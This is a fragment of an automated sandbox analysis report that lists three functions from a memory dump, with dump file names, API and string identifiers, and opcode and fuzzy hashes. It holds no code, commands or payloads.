                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: freestrcmp
                                                                                                                                                                                      • String ID: bua$matchinfo$pcx
                                                                                                                                                                                      • API String ID: 716601943-237985100
                                                                                                                                                                                      • Opcode ID: fe89038ace25e3b1c433550f3e2f5cdd617a4f4ee623b88f6e6e715a3e2b6cf4
                                                                                                                                                                                      • Instruction ID: d7a9de28f1ba4d9dbc53b777f24a38c05efd697a91aa6da7b783da7e5ea27d52
                                                                                                                                                                                      • Opcode Fuzzy Hash: fe89038ace25e3b1c433550f3e2f5cdd617a4f4ee623b88f6e6e715a3e2b6cf4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FE1EE74D043598FEB10CFA8C480B9DBBF1BB49318F64C46AE8A8AB351D775E985CB41
                                                                                                                                                                                      Function 61E3D021 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 293stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strncmp
                                                                                                                                                                                      • String ID: #$-$]
                                                                                                                                                                                      • API String ID: 1114863663-3149169660
                                                                                                                                                                                      • Opcode ID: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
                                                                                                                                                                                      • Instruction ID: 1c490b0b60c0b5d90f91e160a7bf365b8f8ab346ded86ed4ccdc7e106188df17
                                                                                                                                                                                      • Opcode Fuzzy Hash: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
                                                                                                                                                                                      • Instruction Fuzzy Hash: 82D15774D082698BDB01CF98C18479DFBF2BF89748FA9C059D854AB292D335E986CF50
                                                                                                                                                                                      Function 61EAF6D0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __dllonexit_lock_onexit_unlock
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 209411981-0
                                                                                                                                                                                      • Opcode ID: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
                                                                                                                                                                                      • Instruction ID: d8116788f2c50d2f41c70b1de34e9b41b7999a481f31fa547576aa82505b99b8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D1155B5A197418FCB40EF74D48455EBBE0AB89254F618D2EE4E5CB350E738D5848B82